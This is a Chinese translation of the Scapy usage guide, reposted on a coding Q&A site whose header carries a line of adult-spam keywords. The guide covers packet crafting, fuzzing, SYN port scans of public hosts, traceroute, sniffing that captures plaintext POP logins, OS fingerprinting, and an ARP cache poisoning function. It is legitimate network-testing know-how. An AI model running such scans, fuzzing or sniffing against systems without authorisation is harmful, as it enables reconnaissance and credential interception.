久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Scapy 中文文档:三、使用方法

發布時間:2023/12/14 编程问答 23 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Scapy 中文文档:三、使用方法 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

使用方法

譯者:Larry

來源:Scapy中文使用文檔

原文:Usage

協議:CC BY-NC-SA 2.5

0x01 起航Scapy

Scapy的交互shell是運行在一個終端會話當中。因為需要root權限才能發送數據包,所以我們在這里使用sudo

$ sudo scapy Welcome to Scapy (2.0.1-dev) >>>

在Windows當中,請打開命令提示符(cmd.exe),并確保您擁有管理員權限:

C:\>scapy INFO: No IPv6 support in kernel WARNING: No route found for IPv6 destination :: (no default route?) Welcome to Scapy (2.0.1-dev) >>>

如果您沒有安裝所有的可選包,Scapy將會告訴你有些功能不可用:

INFO: Can't import python gnuplot wrapper . Won't be able to plot. INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().

雖然沒有安裝,但發送和接收數據包的基本功能仍能有效。

0x02 互動教程

本節將會告訴您一些Scapy的功能。讓我們按上文所述打開Scapy,親自嘗試些例子吧。

第一步

讓我們來建立一個數據包試一試

>>> a=IP(ttl=10) >>> a < IP ttl=10 |> >>> a.src ’127.0.0.1>>> a.dst="192.168.1.1" >>> a < IP ttl=10 dst=192.168.1.1 |> >>> a.src ’192.168.8.14>>> del(a.ttl) >>> a < IP dst=192.168.1.1 |> >>> a.ttl 64

堆加層次(OSI參考模型)

/操作符在兩層之間起到一個組合的作用。當使用該操作符時,下層可以根據其上層,使它的一個或多個默認字段被重載。(您仍可以賦予您想要的值)一個字符串也可以被用作原料層(raw layer)。

>>> IP() <IP |> >>> IP()/TCP() <IP frag=0 proto=TCP |<TCP |>> >>> Ether()/IP()/TCP() <Ether type=0x800 |<IP frag=0 proto=TCP |<TCP |>>> >>> IP()/TCP()/"GET / HTTP/1.0\r\n\r\n" <IP frag=0 proto=TCP |<TCP |<Raw load='GET / HTTP/1.0\r\n\r\n' |>>> >>> Ether()/IP()/IP()/UDP() <Ether type=0x800 |<IP frag=0 proto=IP |<IP frag=0 proto=UDP |<UDP |>>>> >>> IP(proto=55)/TCP() <IP frag=0 proto=55 |<TCP |>>

每一個數據包都可以被建立或分解(注意:在Python中_(下劃線)是上一條語句執行的結果):

>>> str(IP()) 'E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01' >>> IP(_) <IP version=4L ihl=5L tos=0x0 len=20 id=1 flags= frag=0L ttl=64 proto=IPchksum=0x7ce7 src=127.0.0.1 dst=127.0.0.1 |> >>> a=Ether()/IP(dst="www.slashdot.org")/TCP()/"GET /index.html HTTP/1.0 \n\n" >>> hexdump(a) 00 02 15 37 A2 44 00 AE F3 52 AA D1 08 00 45 00 ...7.D...R....E. 00 43 00 01 00 00 40 06 78 3C C0 A8 05 15 42 23 .C....@.x<....B# FA 97 00 14 00 50 00 00 00 00 00 00 00 00 50 02 .....P........P. 20 00 BB 39 00 00 47 45 54 20 2F 69 6E 64 65 78 ..9..GET /index 2E 68 74 6D 6C 20 48 54 54 50 2F 31 2E 30 20 0A .html HTTP/1.0 . 0A . >>> b=str(a) >>> b '\x00\x02\x157\xa2D\x00\xae\xf3R\xaa\xd1\x08\x00E\x00\x00C\x00\x01\x00\x00@\x06x<\xc0\xa8\x05\x15B#\xfa\x97\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xbb9\x00\x00GET /index.html HTTP/1.0 \n\n' >>> c=Ether(b) >>> c <Ether dst=00:02:15:37:a2:44 src=00:ae:f3:52:aa:d1 type=0x800 |<IP version=4Lihl=5L tos=0x0 len=67 id=1 flags= frag=0L ttl=64 proto=TCP chksum=0x783csrc=192.168.5.21 dst=66.35.250.151 options='' |<TCP sport=20 dport=80 seq=0Lack=0L dataofs=5L reserved=0L flags=S window=8192 chksum=0xbb39 urgptr=0options=[] |<Raw load='GET /index.html HTTP/1.0 \n\n' |>>>>

我們看到一個分解的數據包將其所有的字段填充。那是因為我認為,附加有原始字符串的字段都有它自身的價值。如果這太冗長,hide_defaults()方法將會刪除具有默認值的字段:

>>> c.hide_defaults() >>> c <Ether dst=00:0f:66:56:fa:d2 src=00:ae:f3:52:aa:d1 type=0x800 |<IP ihl=5L len=67frag=0 proto=TCP chksum=0x783c src=192.168.5.21 dst=66.35.250.151 |<TCP dataofs=5Lchksum=0xbb39 options=[] |<Raw load='GET /index.html HTTP/1.0 \n\n' |>>>>

讀取PCAP文件

你可以從PCAP文件中讀取數據包,并將其寫入到一個PCAP文件中。

>>> a=rdpcap("/spare/captures/isakmp.cap") >>> a <isakmp.cap: UDP:721 TCP:0 ICMP:0 Other:0>

圖形轉儲(PDF,PS)

如果您已經安裝PyX,您可以做一個數據包的圖形PostScript/ PDF轉儲(見下面丑陋的PNG圖像,PostScript/PDF則具有更好的質量…)

>>> a[423].pdfdump(layer_shift=1) >>> a[423].psdump("/tmp/isakmp_pkt.eps",layer_shift=1)

命令效果
str(pkt)組裝數據包
hexdump(pkt)十六進制轉儲
ls(pkt)顯示出字段值的列表
pkt.summary()一行摘要
pkt.show()針對數據包的展開試圖
pkt.show2()顯示聚合的數據包(例如,計算好了校驗和)
pkt.sprintf()用數據包字段填充格式字符串
pkt.decode_payload_as()改變payload的decode方式
pkt.psdump()繪制一個解釋說明的PostScript圖表
pkt.pdfdump()繪制一個解釋說明的PDF
pkt.command()返回可以生成數據包的Scapy命令

生成一組數據包

目前我們只是生成一個數據包。讓我們看看如何輕易地定制一組數據包。整個數據包的每一個字段(甚至是網絡層次)都可以是一組。在這里隱含地定義了一組數據包的概念,意即是使用所有區域之間的笛卡爾乘積來生成的一組數據包。

>>> a=IP(dst="www.slashdot.org/30") >>> a <IP dst=Net('www.slashdot.org/30') |> >>> [p for p in a] [<IP dst=66.35.250.148 |>, <IP dst=66.35.250.149 |>,<IP dst=66.35.250.150 |>, <IP dst=66.35.250.151 |>] >>> b=IP(ttl=[1,2,(5,9)]) >>> b <IP ttl=[1, 2, (5, 9)] |> >>> [p for p in b] [<IP ttl=1 |>, <IP ttl=2 |>, <IP ttl=5 |>, <IP ttl=6 |>,<IP ttl=7 |>, <IP ttl=8 |>, <IP ttl=9 |>] >>> c=TCP(dport=[80,443]) >>> [p for p in a/c] [<IP frag=0 proto=TCP dst=66.35.250.148 |<TCP dport=80 |>>,<IP frag=0 proto=TCP dst=66.35.250.148 |<TCP dport=443 |>>,<IP frag=0 proto=TCP dst=66.35.250.149 |<TCP dport=80 |>>,<IP frag=0 proto=TCP dst=66.35.250.149 |<TCP dport=443 |>>,<IP frag=0 proto=TCP dst=66.35.250.150 |<TCP dport=80 |>>,<IP frag=0 proto=TCP dst=66.35.250.150 |<TCP dport=443 |>>,<IP frag=0 proto=TCP dst=66.35.250.151 |<TCP dport=80 |>>,<IP frag=0 proto=TCP dst=66.35.250.151 |<TCP dport=443 |>>]

某些操作(如修改一個數據包中的字符串)無法對于一組數據包使用。在這些情況下,如果您忘記展開您的數據包集合,只有您忘記生成的列表中的第一個元素會被用于組裝數據包。

命令效果
summary()顯示一個關于每個數據包的摘要列表
nsummary()同上,但規定了數據包數量
conversations()顯示一個會話圖表
show()顯示首選表示(通常用nsummary())
filter()返回一個lambda過濾后的數據包列表
hexdump()返回所有數據包的一個hexdump
hexraw()返回所以數據包Raw layer的hexdump
padding()返回一個帶填充的數據包的hexdump
nzpadding()返回一個具有非零填充的數據包的hexdump
plot()規劃一個應用到數據包列表的lambda函數
make table()根據lambda函數來顯示表格

發送數據包

現在我們知道了如何處理數據包。讓我們來看看如何發送它們。send()函數將會在第3層發送數據包。也就是說它會為你處理路由和第2層的數據。sendp()函數將會工作在第2層。選擇合適的接口和正確的鏈路層協議都取決于你。

>>> send(IP(dst="1.2.3.4")/ICMP()) . Sent 1 packets. >>> sendp(Ether()/IP(dst="1.2.3.4",ttl=(1,4)), iface="eth1") .... Sent 4 packets. >>> sendp("I'm travelling on Ethernet", iface="eth1", loop=1, inter=0.2) ................^C Sent 16 packets. >>> sendp(rdpcap("/tmp/pcapfile")) # tcpreplay ........... Sent 11 packets.

Fuzzing

fuzz()函數可以通過一個具有隨機值、數據類型合適的對象,來改變任何默認值,但該值不能是被計算的(像校驗和那樣)。這使得可以快速建立循環模糊化測試模板。在下面的例子中,IP層是正常的,UDP層和NTP層被fuzz。UDP的校驗和是正確的,UDP的目的端口被NTP重載為123,而且NTP的版本被更變為4.其他所有的端口將被隨機分組:

>>> send(IP(dst="target")/fuzz(UDP()/NTP(version=4)),loop=1) ................^C Sent 16 packets.

發送和接收數據包(sr)

現在讓我們做一些有趣的事情。sr()函數是用來發送數據包和接收應答。該函數返回一對數據包及其應答,還有無應答的數據包。sr1()函數是一種變體,用來返回一個應答數據包。發送的數據包必須是第3層報文(IP,ARP等)。srp()則是使用第2層報文(以太網,802.3等)。

>>> p=sr1(IP(dst="www.slashdot.org")/ICMP()/"XXXXXXXXXXX") Begin emission: ...Finished to send 1 packets. .* Received 5 packets, got 1 answers, remaining 0 packets >>> p <IP version=4L ihl=5L tos=0x0 len=39 id=15489 flags= frag=0L ttl=42 proto=ICMPchksum=0x51dd src=66.35.250.151 dst=192.168.5.21 options='' |<ICMP type=echo-replycode=0 chksum=0xee45 id=0x0 seq=0x0 |<Raw load='XXXXXXXXXXX'|<Padding load='\x00\x00\x00\x00' |>>>> >>> p.show() ---[ IP ]--- version = 4L ihl = 5L tos = 0x0 len = 39 id = 15489 flags = frag = 0L ttl = 42 proto = ICMP chksum = 0x51dd src = 66.35.250.151 dst = 192.168.5.21 options = '' ---[ ICMP ]---type = echo-replycode = 0chksum = 0xee45id = 0x0seq = 0x0 ---[ Raw ]---load = 'XXXXXXXXXXX' ---[ Padding ]---load = '\x00\x00\x00\x00'

DNS查詢(rd = recursion desired)。主機192.168.5.1是我的DNS服務器。注意從我Linksys來的非空填充具有Etherleak缺陷:

>>> sr1(IP(dst="192.168.5.1")/UDP()/DNS(rd=1,qd=DNSQR(qname="www.slashdot.org"))) Begin emission: Finished to send 1 packets. ..* Received 3 packets, got 1 answers, remaining 0 packets <IP version=4L ihl=5L tos=0x0 len=78 id=0 flags=DF frag=0L ttl=64 proto=UDP chksum=0xaf38src=192.168.5.1 dst=192.168.5.21 options='' |<UDP sport=53 dport=53 len=58 chksum=0xd55d|<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=ok qdcount=1 ancount=1nscount=0 arcount=0 qd=<DNSQR qname='www.slashdot.org.' qtype=A qclass=IN |>an=<DNSRR rrname='www.slashdot.org.' type=A rclass=IN ttl=3560L rdata='66.35.250.151' |>ns=0 ar=0 |<Padding load='\xc6\x94\xc7\xeb' |>>>>

發送和接收函數族是scapy中的核心部分。它們返回一對兩個列表。第一個就是發送的數據包及其應答組成的列表,第二個是無應答數據包組成的列表。為了更好地呈現它們,它們被封裝成一個對象,并且提供了一些便于操作的方法:

>>> sr(IP(dst="192.168.8.1")/TCP(dport=[21,22,23])) Received 6 packets, got 3 answers, remaining 0 packets (<Results: UDP:0 TCP:3 ICMP:0 Other:0>, <Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>) >>> ans,unans=_ >>> ans.summary() IP / TCP 192.168.8.14:20 > 192.168.8.1:21 S ==> Ether / IP / TCP 192.168.8.1:21 > 192.168.8.14:20 RA / Padding IP / TCP 192.168.8.14:20 > 192.168.8.1:22 S ==> Ether / IP / TCP 192.168.8.1:22 > 192.168.8.14:20 RA / Padding IP / TCP 192.168.8.14:20 > 192.168.8.1:23 S ==> Ether / IP / TCP 192.168.8.1:23 > 192.168.8.14:20 RA / Padding

如果對于應答數據包有速度限制,你可以通過inter參數來設置兩個數據包之間等待的時間間隔。如果有些數據包丟失了,或者設置時間間隔不足以滿足要求,你可以重新發送所有無應答數據包。你可以簡單地對無應答數據包列表再調用一遍函數,或者去設置retry參數。如果retry設置為3,scapy會對無應答的數據包重復發送三次。如果retry設為-3,scapy則會一直發送無應答的數據包,直到。timeout參數設置在最后一個數據包發出去之后的等待時間:

SYN Scans

在Scapy提示符中執行一下命令,可以對經典的SYN Scan初始化:

>>> sr1(IP(dst="72.14.207.99")/TCP(dport=80,flags="S"))

以上向Google的80端口發送了一個SYN數據包,會在接收到一個應答后退出:

Begin emission: .Finished to send 1 packets. * Received 2 packets, got 1 answers, remaining 0 packets <IP version=4L ihl=5L tos=0x20 len=44 id=33529 flags= frag=0L ttl=244 proto=TCP chksum=0x6a34 src=72.14.207.99 dst=192.168.1.100 options=// | <TCP sport=www dport=ftp-data seq=2487238601L ack=1 dataofs=6L reserved=0L flags=SA window=8190 chksum=0xcdc7 urgptr=0 options=[('MSS', 536)] | <Padding load='V\xf7' |>>>

從以上的輸出中可以看出,Google返回了一個SA(SYN-ACK)標志位,表示80端口是open的。

使用其他標志位掃描一下系統的440到443端口:

>>> sr(IP(dst="192.168.1.1")/TCP(sport=666,dport=(440,443),flags="S"))

或者

>>> sr(IP(dst="192.168.1.1")/TCP(sport=RandShort(),dport=[440,441,442,443],flags="S"))

可以對收集的數據包進行摘要(summary),來快速地瀏覽響應:

>>> ans,unans = _ >>> ans.summary() IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:440 S ======> IP / TCP 192.168.1.1:440 > 192.168.1.100:ftp-data RA / Padding IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:441 S ======> IP / TCP 192.168.1.1:441 > 192.168.1.100:ftp-data RA / Padding IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:442 S ======> IP / TCP 192.168.1.1:442 > 192.168.1.100:ftp-data RA / Padding IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:https S ======> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp-data SA / Padding

以上顯示了我們在掃描過程中的請求應答對。我們也可以用一個循環只顯示我們感興趣的信息:

>>> ans.summary( lambda(s,r): r.sprintf("%TCP.sport% \t %TCP.flags%") ) 440 RA 441 RA 442 RA https SA

可以使用make_table()函數建立一個表格,更好地顯示多個目標信息:

>>> ans,unans = sr(IP(dst=["192.168.1.1","yahoo.com","slashdot.org"])/TCP(dport=[22,80,443],flags="S")) Begin emission: .......*.**.......Finished to send 9 packets. **.*.*..*.................. Received 362 packets, got 8 answers, remaining 1 packets >>> ans.make_table( ... lambda(s,r): (s.dst, s.dport, ... r.sprintf("{TCP:%TCP.flags%}{ICMP:%IP.src% - %ICMP.type%}")))66.35.250.150 192.168.1.1 216.109.112.135 22 66.35.250.150 - dest-unreach RA - 80 SA RA SA 443 SA SA SA

在以上的例子中,如果接收到作為響應的ICMP數據包而不是預期的TCP數據包,就會打印出ICMP差錯類型(error type)。

對于更大型的掃描,我們可能對某個響應感興趣,下面的例子就只顯示設置了”SA”標志位的數據包:

>>> ans.nsummary(lfilter = lambda (s,r): r.sprintf("%TCP.flags%") == "SA") 0003 IP / TCP 192.168.1.100:ftp_data > 192.168.1.1:https S ======> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp_data SA

如果我們想對響應進行專業分析,我們可以使用使用以下的命令顯示哪些端口是open的:

>>> ans.summary(lfilter = lambda (s,r): r.sprintf("%TCP.flags%") == "SA",prn=lambda(s,r):r.sprintf("%TCP.sport% is open")) https is open

對于更大型的掃描,我們可以建立一個端口開放表:

>>> ans.filter(lambda (s,r):TCP in r and r[TCP].flags&2).make_table(lambda (s,r): ... (s.dst, s.dport, "X"))66.35.250.150 192.168.1.1 216.109.112.135 80 X - X 443 X X X

如果以上的方法還不夠,Scapy還包含一個report_ports()函數,該函數不僅可以自動化SYN scan,而且還會對收集的結果以LaTeX形式輸出:

>>> report_ports("192.168.1.1",(440,443)) Begin emission: ...*.**Finished to send 4 packets. * Received 8 packets, got 4 answers, remaining 0 packets '\\begin{tabular}{|r|l|l|}\n\\hline\nhttps & open & SA \\\\\n\\hline\n440& closed & TCP RA \\\\\n441 & closed & TCP RA \\\\\n442 & closed & TCP RA \\\\\n\\hline\n\\hline\n\\end{tabular}\n'

TCP traceroute

TCP路由追蹤:

>>> ans,unans=sr(IP(dst=target, ttl=(4,25),id=RandShort())/TCP(flags=0x2)) *****.******.*.***..*.**Finished to send 22 packets. ***...... Received 33 packets, got 21 answers, remaining 1 packets >>> for snd,rcv in ans: ... print snd.ttl, rcv.src, isinstance(rcv.payload, TCP) ... 5 194.51.159.65 0 6 194.51.159.49 0 4 194.250.107.181 0 7 193.251.126.34 0 8 193.251.126.154 0 9 193.251.241.89 0 10 193.251.241.110 0 11 193.251.241.173 0 13 208.172.251.165 0 12 193.251.241.173 0 14 208.172.251.165 0 15 206.24.226.99 0 16 206.24.238.34 0 17 173.109.66.90 0 18 173.109.88.218 0 19 173.29.39.101 1 20 173.29.39.101 1 21 173.29.39.101 1 22 173.29.39.101 1 23 173.29.39.101 1 24 173.29.39.101 1

注意:TCP路由跟蹤和其他高級函數早已被構造好了:

>>> lsc() sr : Send and receive packets at layer 3 sr1 : Send packets at layer 3 and return only the first answer srp : Send and receive packets at layer 2 srp1 : Send and receive packets at layer 2 and return only the first answer srloop : Send a packet at layer 3 in loop and print the answer each time srploop : Send a packet at layer 2 in loop and print the answer each time sniff : Sniff packets p0f : Passive OS fingerprinting: which OS emitted this TCP SYN ? arpcachepoison : Poison target's cache with (your MAC,victim's IP) couple send : Send packets at layer 3 sendp : Send packets at layer 2 traceroute : Instant TCP traceroute arping : Send ARP who-has requests to determine which hosts are up ls : List available layers, or infos on a given layer lsc : List user commands queso : Queso OS fingerprinting nmap_fp : nmap fingerprinting report_ports : portscan a target and output a LaTeX table dyndns_add : Send a DNS add message to a nameserver for "name" to have a new "rdata" dyndns_del : Send a DNS delete message to a nameserver for "name" [...]

配置高級sockets

發送和接收數據包的過程是相當復雜的。

Sniffing

我們可以簡單地捕獲數據包,或者是克隆tcpdump或tethereal的功能。如果沒有指定interface,則會 在所有的interface上進行嗅探:

>>> sniff(filter="icmp and host 66.35.250.151", count=2) <Sniffed: UDP:0 TCP:0 ICMP:2 Other:0> >>> a=_ >>> a.nsummary() 0000 Ether / IP / ICMP 192.168.5.21 echo-request 0 / Raw 0001 Ether / IP / ICMP 192.168.5.21 echo-request 0 / Raw >>> a[1] <Ether dst=00:ae:f3:52:aa:d1 src=00:02:15:37:a2:44 type=0x800 |<IP version=4Lihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=ICMP chksum=0x3831src=192.168.5.21 dst=66.35.250.151 options='' |<ICMP type=echo-request code=0chksum=0x6571 id=0x8745 seq=0x0 |<Raw load='B\xf7g\xda\x00\x07um\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\x22#$%&\'()*+,-./01234567' |>>>> >>> sniff(iface="wifi0", prn=lambda x: x.summary()) 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates 802.11 Management 5 00:0a:41:ee:a5:50 / 802.11 Probe Response / Info SSID / Info Rates / Info DSset / Info 133 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133 802.11 Management 11 00:07:50:d6:44:3f / 802.11 Authentication 802.11 Management 11 00:0a:41:ee:a5:50 / 802.11 Authentication 802.11 Management 0 00:07:50:d6:44:3f / 802.11 Association Request / Info SSID / Info Rates / Info 133 / Info 149 802.11 Management 1 00:0a:41:ee:a5:50 / 802.11 Association Response / Info Rates / Info 133 / Info 149 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133 802.11 / LLC / SNAP / ARP who has 172.20.70.172 says 172.20.70.171 / Padding 802.11 / LLC / SNAP / ARP is at 00:0a:b7:4b:9c:dd says 172.20.70.172 / Padding 802.11 / LLC / SNAP / IP / ICMP echo-request 0 / Raw 802.11 / LLC / SNAP / IP / ICMP echo-reply 0 / Raw >>> sniff(iface="eth1", prn=lambda x: x.show()) ---[ Ethernet ]--- dst = 00:ae:f3:52:aa:d1 src = 00:02:15:37:a2:44 type = 0x800 ---[ IP ]---version = 4Lihl = 5Ltos = 0x0len = 84id = 0flags = DFfrag = 0Lttl = 64proto = ICMPchksum = 0x3831src = 192.168.5.21dst = 66.35.250.151options = '' ---[ ICMP ]---type = echo-requestcode = 0chksum = 0x89d9id = 0xc245seq = 0x0 ---[ Raw ]---load = 'B\xf7i\xa9\x00\x04\x149\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\x22#$%&\'()*+,-./01234567' ---[ Ethernet ]--- dst = 00:02:15:37:a2:44 src = 00:ae:f3:52:aa:d1 type = 0x800 ---[ IP ]---version = 4Lihl = 5Ltos = 0x0len = 84id = 2070flags =frag = 0Lttl = 42proto = ICMPchksum = 0x861bsrc = 66.35.250.151dst = 192.168.5.21options = '' ---[ ICMP ]---type = echo-replycode = 0chksum = 0x91d9id = 0xc245seq = 0x0 ---[ Raw ]---load = 'B\xf7i\xa9\x00\x04\x149\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\x22#$%&\'()*+,-./01234567' ---[ Padding ]---load = '\n_\x00\x0b'

對于控制輸出信息,我們可以使用sprintf()函數:

>>> pkts = sniff(prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}")) 192.168.1.100 -> 64.233.167.99 64.233.167.99 -> 192.168.1.100 192.168.1.100 -> 64.233.167.99 192.168.1.100 -> 64.233.167.99 'GET / HTTP/1.1\r\nHost: 64.233.167.99\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8\r\nAccept: text/xml,application/xml,application/xhtml+xml, text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\n\r\n'

我們可以嗅探并進行被動操作系統指紋識別:

>>> p <Ether dst=00:10:4b:b3:7d:4e src=00:40:33:96:7b:60 type=0x800 |<IP version=4Lihl=5L tos=0x0 len=60 id=61681 flags=DF frag=0L ttl=64 proto=TCP chksum=0xb85esrc=192.168.8.10 dst=192.168.8.1 options='' |<TCP sport=46511 dport=80seq=2023566040L ack=0L dataofs=10L reserved=0L flags=SEC window=5840chksum=0x570c urgptr=0 options=[('Timestamp', (342940201L, 0L)), ('MSS', 1460),('NOP', ()), ('SAckOK', ''), ('WScale', 0)] |>>> >>> load_module("p0f") >>> p0f(p) (1.0, ['Linux 2.4.2 - 2.4.14 (1)']) >>> a=sniff(prn=prnp0f) (1.0, ['Linux 2.4.2 - 2.4.14 (1)']) (1.0, ['Linux 2.4.2 - 2.4.14 (1)']) (0.875, ['Linux 2.4.2 - 2.4.14 (1)', 'Linux 2.4.10 (1)', 'Windows 98 (?)']) (1.0, ['Windows 2000 (9)'])

猜測操作系統版本前的數字為猜測的精確度。

Filters

演示一下bpf過濾器和sprintf()方法:

>>> a=sniff(filter="tcp and ( port 25 or port 110 )",prn=lambda x: x.sprintf("%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport% %2s,TCP.flags% : %TCP.payload%")) 192.168.8.10:47226 -> 213.228.0.14:110 S : 213.228.0.14:110 -> 192.168.8.10:47226 SA : 192.168.8.10:47226 -> 213.228.0.14:110 A : 213.228.0.14:110 -> 192.168.8.10:47226 PA : +OK <13103.1048117923@pop2-1.free.fr> 192.168.8.10:47226 -> 213.228.0.14:110 A : 192.168.8.10:47226 -> 213.228.0.14:110 PA : USER toto 213.228.0.14:110 -> 192.168.8.10:47226 A : 213.228.0.14:110 -> 192.168.8.10:47226 PA : +OK 192.168.8.10:47226 -> 213.228.0.14:110 A : 192.168.8.10:47226 -> 213.228.0.14:110 PA : PASS tata 213.228.0.14:110 -> 192.168.8.10:47226 PA : -ERR authorization failed 192.168.8.10:47226 -> 213.228.0.14:110 A : 213.228.0.14:110 -> 192.168.8.10:47226 FA : 192.168.8.10:47226 -> 213.228.0.14:110 FA : 213.228.0.14:110 -> 192.168.8.10:47226 A :

在循環中接收和發送

這兒有一個例子來實現類似(h)ping的功能:你一直發送同樣的數據包集合來觀察是否發生變化:

>>> srloop(IP(dst="www.target.com/30")/TCP()) RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 SIP / TCP 192.168.8.14:20 > 192.168.11.98:80 SIP / TCP 192.168.8.14:20 > 192.168.11.97:80 S RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 SIP / TCP 192.168.8.14:20 > 192.168.11.98:80 SIP / TCP 192.168.8.14:20 > 192.168.11.97:80 S RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 SIP / TCP 192.168.8.14:20 > 192.168.11.98:80 SIP / TCP 192.168.8.14:20 > 192.168.11.97:80 S RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 SIP / TCP 192.168.8.14:20 > 192.168.11.98:80 SIP / TCP 192.168.8.14:20 > 192.168.11.97:80 S

導入和導出數據

PCAP

通??梢詫祿4鏋閜cap文件以備后用,或者是供其他的應用程序使用:

>>> wrpcap("temp.cap",pkts)

還原之前保存的pcap文件:

>>> pkts = rdpcap("temp.cap")

或者

>>> pkts = rdpcap("temp.cap")

Hexdump

Scapy允許你以不同的十六進制格式輸出編碼的數據包。

使用hexdump()函數會以經典的hexdump格式輸出數據包:

>>> hexdump(pkt) 0000 00 50 56 FC CE 50 00 0C 29 2B 53 19 08 00 45 00 .PV..P..)+S...E. 0010 00 54 00 00 40 00 40 01 5A 7C C0 A8 19 82 04 02 .T..@.@.Z|...... 0020 02 01 08 00 9C 90 5A 61 00 01 E6 DA 70 49 B6 E5 ......Za....pI.. 0030 08 00 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 ................ 0040 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 .......... !"#$% 0050 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &'()*+,-./012345 0060 36 37 67

使用import_hexcap()函數可以將以上的hexdump重新導入到Scapy中:

>>> pkt_hex = Ether(import_hexcap()) 0000 00 50 56 FC CE 50 00 0C 29 2B 53 19 08 00 45 00 .PV..P..)+S...E. 0010 00 54 00 00 40 00 40 01 5A 7C C0 A8 19 82 04 02 .T..@.@.Z|...... 0020 02 01 08 00 9C 90 5A 61 00 01 E6 DA 70 49 B6 E5 ......Za....pI.. 0030 08 00 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 ................ 0040 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 .......... !"#$% 0050 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &'()*+,-./012345 0060 36 37 67 >>> pkt_hex <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\xe6\xdapI\xb6\xe5\x08\x00\x08\t\n \x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e \x1f !"#$%&\'()*+,-./01234567' |>>>>

Hex string

使用str()函數可以將整個數據包轉換成十六進制字符串:

